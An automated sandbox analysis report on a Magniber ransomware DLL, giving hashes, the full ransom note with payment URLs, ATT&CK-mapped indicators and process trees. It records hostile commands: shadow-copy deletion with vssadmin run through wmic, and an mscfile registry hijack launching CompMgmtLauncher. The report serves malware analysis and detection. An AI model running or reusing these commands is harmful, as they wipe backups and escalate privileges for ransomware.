magniber | fd4a482cc2d1469c31a4bed466d4acf717ecaa83af1abd677198d254ee25bf22

Analysis

max time kernel
120s
max time network
149s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
22-12-2023 07:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7b598815af2522938f6bc3fb53010cc0.dll
Size

38KB
MD5

7b598815af2522938f6bc3fb53010cc0
SHA1

76b6d116179c3cd38f1b715fe1778290eb87c676
SHA256

fd4a482cc2d1469c31a4bed466d4acf717ecaa83af1abd677198d254ee25bf22
SHA512

5e3fe2689dd31b1c488256f332c829bab3e97ba89fba020a423130af13657e21341514d38f7cc33a636e47fb07294083d351d09c7887c4792fc0f1026523210a
SSDEEP

768:B51I4cnvHkMeaEIwCrbjvkTlmx3El3xF00ydemHlTfLIt3GeMdE:31Ix/eaZwCXjvY5/F7ygmRfLIt3GFE

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f86400602a20fa609ddihwvy.ypajgycpauisibmmq6en2xd6z6doiiwxitzhwbu2zmxfxwjcumvirbad.onion/ddihwvy Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f86400602a20fa609ddihwvy.outwest.top/ddihwvy http://f86400602a20fa609ddihwvy.coldsum.space/ddihwvy http://f86400602a20fa609ddihwvy.datesat.site/ddihwvy http://f86400602a20fa609ddihwvy.outplea.xyz/ddihwvy Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f86400602a20fa609ddihwvy.ypajgycpauisibmmq6en2xd6z6doiiwxitzhwbu2zmxfxwjcumvirbad.onion/ddihwvy

http://f86400602a20fa609ddihwvy.outwest.top/ddihwvy

http://f86400602a20fa609ddihwvy.coldsum.space/ddihwvy

http://f86400602a20fa609ddihwvy.datesat.site/ddihwvy

http://f86400602a20fa609ddihwvy.outplea.xyz/ddihwvy

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/1276-15-0x0000000002170000-0x0000000002175000-memory.dmp	family_magniber
behavioral1/memory/1900-1-0x0000000001EB0000-0x0000000002734000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	2888	cmd.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	2888	cmd.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1272	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	2888	cmd.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1176	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	2888	cmd.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	2888	vssadmin.exe	41
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	2888	vssadmin.exe	41

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (80) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1900 set thread context of 1276	1900	rundll32.exe	8
PID 1900 set thread context of 1344	1900	rundll32.exe	7
PID 1900 set thread context of 1392	1900	rundll32.exe	6
PID 1900 set thread context of 1228	1900	rundll32.exe	4

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
624	vssadmin.exe
2380	vssadmin.exe
1588	vssadmin.exe
2336	vssadmin.exe
1272	vssadmin.exe
2884	vssadmin.exe
1176	vssadmin.exe
228	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "409401681"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000046332ab722508540bf00312f0a24f12000000000020000000000106600000001000020000000d65b6707cafd5e07d435668886d9a3f0cc540653248019d58c94681003203f82000000000e80000000020000200000000a2e3c3af69075270bd8a6620ea781b5d87ce0cddbca000640090392e9e7404f90000000a61ea7a35478273aba979384f672a31e468e29e74c757d25a4ec52642740f99e96eb4ba0a64918fd77eaf07eac75d31a7f88dcccf34cd049b005212c5b99afd359cfc1c8ca3e87161b882446cd7e5d51803a424e47fbfdcc105c0819f3e726f0de6e9f1c3e1c5984dd5bdd7048ea1dcc40b5d5da550cd809750517d04c9b8de9477128ad4cb22da35fcd4e2ace8f48d24000000054f2d6ac949478f4e84a7d834d8fdb62ed77949050ec794c4d94e9523910d3015e4046701ed239925bca1cb82a2ef44ee5808c4da17f9c5f50e972d9f97aae12	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4BB81C61-A0B2-11EE-9E53-EE87AAC3DDB6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000046332ab722508540bf00312f0a24f1200000000002000000000010660000000100002000000064aa0b5f26dabd89fafcc054aa9104c5cc58fac24a5a4839cdb2b9dd5c387dd4000000000e8000000002000020000000c804e315ef9122b752c3742b79469716e64f166b9e1b0cfaf6abe6b3ebbb958620000000f1174d55e7a189055c4c10334de9b9d5322d35b87404e65c152ebb29878eaed140000000e5e33509ecc1c3705dc76957f55bc1274c47e74227e8ba8f4e952fbe4d5904278d6132677660f51fa18269ae41b1eab3fda5432dfdbf205c56680d2647bfb4c8	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0317e20bf34da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1568	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1900	rundll32.exe
1900	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1900	rundll32.exe
1900	rundll32.exe
1900	rundll32.exe
1900	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1392	Explorer.EXE
Token: SeShutdownPrivilege	1392	Explorer.EXE
Token: SeShutdownPrivilege	1392	Explorer.EXE
Token: SeShutdownPrivilege	1392	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe
Token: SeSystemProfilePrivilege	1112	WMIC.exe
Token: SeSystemtimePrivilege	1112	WMIC.exe
Token: SeProfSingleProcessPrivilege	1112	WMIC.exe
Token: SeIncBasePriorityPrivilege	1112	WMIC.exe
Token: SeCreatePagefilePrivilege	1112	WMIC.exe
Token: SeBackupPrivilege	1112	WMIC.exe
Token: SeRestorePrivilege	1112	WMIC.exe
Token: SeShutdownPrivilege	1112	WMIC.exe
Token: SeDebugPrivilege	1112	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1112	WMIC.exe
Token: SeRemoteShutdownPrivilege	1112	WMIC.exe
Token: SeUndockPrivilege	1112	WMIC.exe
Token: SeManageVolumePrivilege	1112	WMIC.exe
Token: 33	1112	WMIC.exe
Token: 34	1112	WMIC.exe
Token: 35	1112	WMIC.exe
Token: SeIncreaseQuotaPrivilege	240	wmic.exe
Token: SeSecurityPrivilege	240	wmic.exe
Token: SeTakeOwnershipPrivilege	240	wmic.exe
Token: SeLoadDriverPrivilege	240	wmic.exe
Token: SeSystemProfilePrivilege	240	wmic.exe
Token: SeSystemtimePrivilege	240	wmic.exe
Token: SeProfSingleProcessPrivilege	240	wmic.exe
Token: SeIncBasePriorityPrivilege	240	wmic.exe
Token: SeCreatePagefilePrivilege	240	wmic.exe
Token: SeBackupPrivilege	240	wmic.exe
Token: SeRestorePrivilege	240	wmic.exe
Token: SeShutdownPrivilege	240	wmic.exe
Token: SeDebugPrivilege	240	wmic.exe
Token: SeSystemEnvironmentPrivilege	240	wmic.exe
Token: SeRemoteShutdownPrivilege	240	wmic.exe
Token: SeUndockPrivilege	240	wmic.exe
Token: SeManageVolumePrivilege	240	wmic.exe
Token: 33	240	wmic.exe
Token: 34	240	wmic.exe
Token: 35	240	wmic.exe
Token: SeShutdownPrivilege	1392	Explorer.EXE
Token: SeShutdownPrivilege	1392	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1804	wmic.exe
Token: SeSecurityPrivilege	1804	wmic.exe
Token: SeTakeOwnershipPrivilege	1804	wmic.exe
Token: SeLoadDriverPrivilege	1804	wmic.exe
Token: SeSystemProfilePrivilege	1804	wmic.exe
Token: SeSystemtimePrivilege	1804	wmic.exe
Token: SeProfSingleProcessPrivilege	1804	wmic.exe
Token: SeIncBasePriorityPrivilege	1804	wmic.exe
Token: SeCreatePagefilePrivilege	1804	wmic.exe
Token: SeBackupPrivilege	1804	wmic.exe
Token: SeRestorePrivilege	1804	wmic.exe
Token: SeShutdownPrivilege	1804	wmic.exe
Token: SeDebugPrivilege	1804	wmic.exe
Token: SeSystemEnvironmentPrivilege	1804	wmic.exe
Token: SeRemoteShutdownPrivilege	1804	wmic.exe
Token: SeUndockPrivilege	1804	wmic.exe
Token: SeManageVolumePrivilege	1804	wmic.exe
Token: 33	1804	wmic.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
1656	iexplore.exe
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1656	iexplore.exe
1656	iexplore.exe
2700	IEXPLORE.EXE
2700	IEXPLORE.EXE
2700	IEXPLORE.EXE
2700	IEXPLORE.EXE

Suspicious use of UnmapMainImage 3 IoCs

pid	Process
1392	Explorer.EXE
1392	Explorer.EXE
1392	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1276 wrote to memory of 1568	1276	taskhost.exe	28
PID 1276 wrote to memory of 1568	1276	taskhost.exe	28
PID 1276 wrote to memory of 1568	1276	taskhost.exe	28
PID 1276 wrote to memory of 1708	1276	taskhost.exe	29
PID 1276 wrote to memory of 1708	1276	taskhost.exe	29
PID 1276 wrote to memory of 1708	1276	taskhost.exe	29
PID 1276 wrote to memory of 240	1276	taskhost.exe	34
PID 1276 wrote to memory of 240	1276	taskhost.exe	34
PID 1276 wrote to memory of 240	1276	taskhost.exe	34
PID 1276 wrote to memory of 1628	1276	taskhost.exe	30
PID 1276 wrote to memory of 1628	1276	taskhost.exe	30
PID 1276 wrote to memory of 1628	1276	taskhost.exe	30
PID 1628 wrote to memory of 1112	1628	cmd.exe	35
PID 1628 wrote to memory of 1112	1628	cmd.exe	35
PID 1628 wrote to memory of 1112	1628	cmd.exe	35
PID 1392 wrote to memory of 1804	1392	Explorer.EXE	38
PID 1392 wrote to memory of 1804	1392	Explorer.EXE	38
PID 1392 wrote to memory of 1804	1392	Explorer.EXE	38
PID 1392 wrote to memory of 1776	1392	Explorer.EXE	37
PID 1392 wrote to memory of 1776	1392	Explorer.EXE	37
PID 1392 wrote to memory of 1776	1392	Explorer.EXE	37
PID 1776 wrote to memory of 3028	1776	cmd.exe	40
PID 1776 wrote to memory of 3028	1776	cmd.exe	40
PID 1776 wrote to memory of 3028	1776	cmd.exe	40
PID 2832 wrote to memory of 2688	2832	cmd.exe	50
PID 2832 wrote to memory of 2688	2832	cmd.exe	50
PID 2832 wrote to memory of 2688	2832	cmd.exe	50
PID 2120 wrote to memory of 2608	2120	cmd.exe	52
PID 2120 wrote to memory of 2608	2120	cmd.exe	52
PID 2120 wrote to memory of 2608	2120	cmd.exe	52
PID 2688 wrote to memory of 2480	2688	CompMgmtLauncher.exe	55
PID 2688 wrote to memory of 2480	2688	CompMgmtLauncher.exe	55
PID 2688 wrote to memory of 2480	2688	CompMgmtLauncher.exe	55
PID 2608 wrote to memory of 2592	2608	CompMgmtLauncher.exe	53
PID 2608 wrote to memory of 2592	2608	CompMgmtLauncher.exe	53
PID 2608 wrote to memory of 2592	2608	CompMgmtLauncher.exe	53
PID 1708 wrote to memory of 1656	1708	cmd.exe	62
PID 1708 wrote to memory of 1656	1708	cmd.exe	62
PID 1708 wrote to memory of 1656	1708	cmd.exe	62
PID 1656 wrote to memory of 2700	1656	iexplore.exe	65
PID 1656 wrote to memory of 2700	1656	iexplore.exe	65
PID 1656 wrote to memory of 2700	1656	iexplore.exe	65
PID 1656 wrote to memory of 2700	1656	iexplore.exe	65
PID 1344 wrote to memory of 2932	1344	Dwm.exe	67
PID 1344 wrote to memory of 2932	1344	Dwm.exe	67
PID 1344 wrote to memory of 2932	1344	Dwm.exe	67
PID 1344 wrote to memory of 1668	1344	Dwm.exe	68
PID 1344 wrote to memory of 1668	1344	Dwm.exe	68
PID 1344 wrote to memory of 1668	1344	Dwm.exe	68
PID 1668 wrote to memory of 956	1668	cmd.exe	71
PID 1668 wrote to memory of 956	1668	cmd.exe	71
PID 1668 wrote to memory of 956	1668	cmd.exe	71
PID 964 wrote to memory of 2548	964	cmd.exe	76
PID 964 wrote to memory of 2548	964	cmd.exe	76
PID 964 wrote to memory of 2548	964	cmd.exe	76
PID 2548 wrote to memory of 1272	2548	CompMgmtLauncher.exe	77
PID 2548 wrote to memory of 1272	2548	CompMgmtLauncher.exe	77
PID 2548 wrote to memory of 1272	2548	CompMgmtLauncher.exe	77
PID 1900 wrote to memory of 2276	1900	rundll32.exe	81
PID 1900 wrote to memory of 2276	1900	rundll32.exe	81
PID 1900 wrote to memory of 2276	1900	rundll32.exe	81
PID 1900 wrote to memory of 1380	1900	rundll32.exe	83
PID 1900 wrote to memory of 1380	1900	rundll32.exe	83
PID 1900 wrote to memory of 1380	1900	rundll32.exe	83

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1228

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1392
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\7b598815af2522938f6bc3fb53010cc0.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2276
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    PID:1380
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:584
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:3028
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1804

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1344
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:956

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1276
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1568
- C:\Windows\system32\cmd.exe
  cmd /c "start http://f86400602a20fa609ddihwvy.outwest.top/ddihwvy^&2^&50094979^&80^&387^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://f86400602a20fa609ddihwvy.outwest.top/ddihwvy&2&50094979&80&387&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1656 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2700
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1628
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:240

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2380

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1588

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2832
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2480

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2592

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2560

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2336

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1272

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:964
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1272

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2884

C:\Windows\system32\vssadmin.exe
